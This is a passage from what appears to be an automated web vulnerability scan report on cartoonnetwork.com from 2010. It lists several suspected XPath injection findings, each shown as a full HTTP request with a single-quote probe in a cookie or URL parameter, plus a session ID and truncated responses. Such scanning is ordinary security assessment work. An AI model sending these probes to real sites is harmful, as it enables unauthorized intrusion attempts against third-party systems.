Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true'; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:59:56 GMT
Server: Apache
Cache-Control: max-age=60, private
Expires: Sat, 11 Dec 2010 03:00:48 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 42078
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- Only Logged in users looking at his page should get here
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.141. http://www.cartoonnetwork.com/profiles/Active/Julie/Beast/index.html [s_sq cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /profiles/Active/Julie/Beast/index.html

Issue detail

The s_sq cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the s_sq cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /profiles/Active/Julie/Beast/index.html HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA'; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:59:59 GMT
Server: Apache
Cache-Control: max-age=60, private
Expires: Sat, 11 Dec 2010 03:00:47 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 42078
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- Only Logged in users looking at his page should get here
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.142. http://www.cartoonnetwork.com/profiles/Active/Julie/Beast/index.html [s_vi cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /profiles/Active/Julie/Beast/index.html

Issue detail

The s_vi cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the s_vi cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /profiles/Active/Julie/Beast/index.html HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]'; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:59:58 GMT
Server: Apache
Cache-Control: max-age=60, private
Expires: Sat, 11 Dec 2010 03:00:48 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 42078
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- Only Logged in users looking at his page should get here
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.143. http://www.cartoonnetwork.com/profiles/Admiral/Cody/Cinnamon/index.html [1401316autoFreqCap cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /profiles/Admiral/Cody/Cinnamon/index.html

Issue detail

The 1401316autoFreqCap cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the 1401316autoFreqCap cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /profiles/Admiral/Cody/Cinnamon/index.html HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0'; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:59:19 GMT
Server: Apache
Cache-Control: max-age=60, private
Expires: Sat, 11 Dec 2010 03:00:05 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 43605
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- Only Logged in users looking at his page should get here
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.144. http://www.cartoonnetwork.com/profiles/Admiral/Cody/Cinnamon/index.html [JSESSIONID cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /profiles/Admiral/Cody/Cinnamon/index.html

Issue detail

The JSESSIONID cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the JSESSIONID cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /profiles/Admiral/Cody/Cinnamon/index.html HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290'; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:59:12 GMT
Server: Apache
Cache-Control: max-age=60, private
Expires: Sat, 11 Dec 2010 03:00:12 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 43605

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- Only Logged in users looking at his page should get here
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.145. http://www.cartoonnetwork.com/profiles/Admiral/Cody/Cinnamon/index.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /profiles/Admiral/Cody/Cinnamon/index.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /profiles'/Admiral/Cody/Cinnamon/index.html HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:59:22 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 22047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1<